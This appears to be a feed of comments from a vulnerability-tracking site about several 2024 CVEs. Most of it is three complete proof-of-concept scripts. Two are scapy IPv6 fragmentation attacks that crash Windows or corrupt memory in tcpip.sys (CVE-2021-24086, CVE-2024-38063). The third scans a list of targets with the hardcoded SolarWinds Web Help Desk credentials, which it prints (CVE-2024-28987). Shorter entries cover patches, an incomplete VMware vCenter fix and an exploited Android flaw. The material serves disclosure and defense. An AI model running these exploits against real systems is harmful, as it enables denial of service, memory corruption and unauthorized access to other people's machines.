Most recent comment.

Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086

2024-11-12T00:33:59.518977+00:00

[Analysis of a denial of service vulnerability affecting the IPv6 stack of Windows](https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html). This issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin. ### Proof of Concept ```python import sys import random from scapy.all import * FRAGMENT_SIZE = 0x400 LAYER4_FRAG_OFFSET = 0x8 NEXT_HEADER_IPV6_ROUTE = 43 NEXT_HEADER_IPV6_FRAG = 44 NEXT_HEADER_IPV6_ICMP = 58 def get_layer4(): er = ICMPv6EchoRequest(data = "PoC for CVE-2021-24086") er.cksum = 0xa472 return raw(er) def get_inner_packet(target_addr): inner_frag_id = random.randint(0, 0xffffffff) print("**** inner_frag_id: 0x{:x}".format(inner_frag_id)) raw_er = get_layer4() # 0x1ffa Routing headers == 0xffd0 bytes routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1) routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG)) # First inner fragment header: offset=0, more=1 FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP) return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id def send_last_inner_fragment(target_addr, inner_frag_id): raw_er = get_layer4() ip = IPv6(dst = target_addr) # Second (and last) inner fragment header: offset=1, more=0 FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP) send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:]) def trigger(target_addr): inner_packet, inner_frag_id = get_inner_packet(target_addr) ip = IPv6(dst = target_addr) hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG) outer_frag_id = random.randint(0, 0xffffffff) fragmentable_part = [] for i in range(len(inner_packet) // FRAGMENT_SIZE): fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE]) if len(inner_packet) % FRAGMENT_SIZE: fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:]) print("Preparing frags...") frag_offset = 0 frags_to_send = [] is_first = True for i in range(len(fragmentable_part)): if i == len(fragmentable_part) - 1: more = 0 else: more = 1 FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE) blob = raw(FH/fragmentable_part[i]) frag_offset += FRAGMENT_SIZE frags_to_send.append(ip/hopbyhop/blob) print("Sending {} frags...".format(len(frags_to_send))) for frag in frags_to_send: send(frag) print("Now sending the last inner fragment to trigger the bug...") send_last_inner_fragment(target_addr, inner_frag_id) if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: cve-2021-24086.py ') sys.exit(1) trigger(sys.argv[1]) ```

Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys

2024-11-12T00:33:59.518901+00:00

[Proof of Concept for CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063), a RCE in tcpip.sys patched on August 13th 2024. An [analysis of the vulnerability](https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html) published on August 27, 2024 by Marcus Hutchins. PoC published on GitHub on August 24, 2024. ### Implementation Implementation details are available on [GitHub](https://github.com/ynwarcs/CVE-2024-38063/blob/main/script/cve-2024-38063.py). ```python from scapy.all import * iface='' ip_addr='' mac_addr='' num_tries=20 num_batches=20 def get_packets_with_mac(i): frag_id = 0xdebac1e + i first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)]) second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa' third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1) return [first, second, third] def get_packets(i): if mac_addr != '': return get_packets_with_mac(i) frag_id = 0xdebac1e + i first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)]) second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa' third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1) return [first, second, third] final_ps = [] for _ in range(num_batches): for i in range(num_tries): final_ps += get_packets(i) + get_packets(i) print("Sending packets") if mac_addr != '': sendp(final_ps, iface) else: send(final_ps, iface) for i in range(60): print(f"Memory corruption will be triggered in {60-i} seconds", end='\r') time.sleep(1) print("") ```

Proof-of-Concept

2024-11-12T00:33:59.518827+00:00

A PoC is available here: https://github.com/fa-rrel/CVE-2024-28987-POC ```python import argparse import base64 import requests # Created by Ghost sec. RED = "\033[91m" GREEN = "\033[92m" BOLD = "\033[1m" RESET = "\033[0m" ascii_art = f""" {BOLD}{RED} ______ __ __ / \ / | / | /$$$$$$ |$$ |____ ______ _______ _$$ |_ _______ ______ _______ $$ | _$$/ $$ \ / \ / |/ $$ | / | / \ / | $$ |/ |$$$$$$$ |/$$$$$$ |/$$$$$$$/ $$$$$$/ /$$$$$$$/ /$$$$$$ |/$$$$$$$/ $$ |$$$$ |$$ | $$ |$$ | $$ |$$ \ $$ | __ $$ \ $$ $$ |$$ | $$ \__$$ |$$ | $$ |$$ \__$$ | $$$$$$ | $$ |/ | $$$$$$ |$$$$$$$$/ $$ \_____ $$ $$/ $$ | $$ |$$ $$/ / $$/ $$ $$/ / $$/ $$ |$$ | $$$$$$/ $$/ $$/ $$$$$$/ $$$$$$$/ $$$$/ $$$$$$$/ $$$$$$$/ $$$$$$$/ PROOF OF CONCEPT CVE-2024-28987 || SCANNING VULNERABILITY POC || github.com/fa-rrel {RESET} """ print(ascii_art) def get_basic_auth_header(username, password): credentials = f"{username}:{password}" base64_credentials = base64.b64encode(credentials.encode()).decode('utf-8') return {'Authorization': f'Basic {base64_credentials}'} def scan_target(hostname): # Ensure hostname does not have trailing slashes hostname = hostname.strip().rstrip('/') url = f"http://{hostname}/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/" # Print formatted URL for debugging print(f"{BOLD}[*] Scanning URL: {url}{RESET}") headers = get_basic_auth_header("helpdeskIntegrationUser", "dev-C4F8025E7") headers['Content-Type'] = 'application/x-www-form-urlencoded' try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200 and 'displayClient' in response.text and 'shortDetail' in response.text: print(f"{BOLD}{GREEN}[+] Vulnerability confirmed on {hostname} with username: 'helpdeskIntegrationUser' and password: 'dev-C4F8025E7'{RESET}") else: print(f"{BOLD}{RED}[-] No vulnerability detected on {hostname}{RESET}") except requests.RequestException: # Modify this line to just print "Not vulnerable" instead of the error details print(f"{BOLD}{RED}[-] Not vulnerable on {hostname}{RESET}") def scan_targets_from_file(file_path): try: with open(file_path, 'r') as file: targets = file.readlines() if not targets: print(f"{BOLD}{RED}[!] No targets found in file{RESET}") return for target in targets: target = target.strip() if target: scan_target(target) except FileNotFoundError: print(f"{BOLD}{RED}[!] File {file_path} not found{RESET}") except Exception as e: print(f"{BOLD}{RED}[!] An error occurred: {e}{RESET}") def main(): parser = argparse.ArgumentParser(description="CVE-2024-28987 Scanner - SolarWinds Web Help Desk Hardcoded Credential") parser.add_argument('-f', '--file', type=str, required=True, help='File containing list of targets') args = parser.parse_args() scan_targets_from_file(args.file) if __name__ == "__main__": main() ```

Availability of a patch

2024-11-12T00:33:59.518745+00:00

The company released [a patch](https://solarwindscore.my.site.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2?language=en_US) in Web Help Desk version 12.8.3 HF2, which addresses this vulnerability. Users are strongly advised to update their software to this version or later to protect against this flaw.

Patches released previously did not completely mitigate the vulnerability

2024-11-12T00:33:59.518625+00:00

VMware has determined that the vCenter patches released previously did not completely mitigate the vulnerability. https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968

Google Warns of Actively Exploited CVE-2024-43093 Vulnerability in Android System

2024-11-12T00:33:59.516512+00:00

> « Nov 05, 2024 Ravie LakshmananMobile Security / Vulnerability Vulnerability in Android System Google has warned that a security flaw impacting its Android operating system has come under active exploitation in the wild. The vulnerability, tracked as CVE-2024-43093, has been described as a privilege escalation flaw in the Android Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories, and their respective sub-directories, according to a code commit message.» [Android Security Bulletin November 2024](https://source.android.com/docs/security/bulletin/2024-11-01)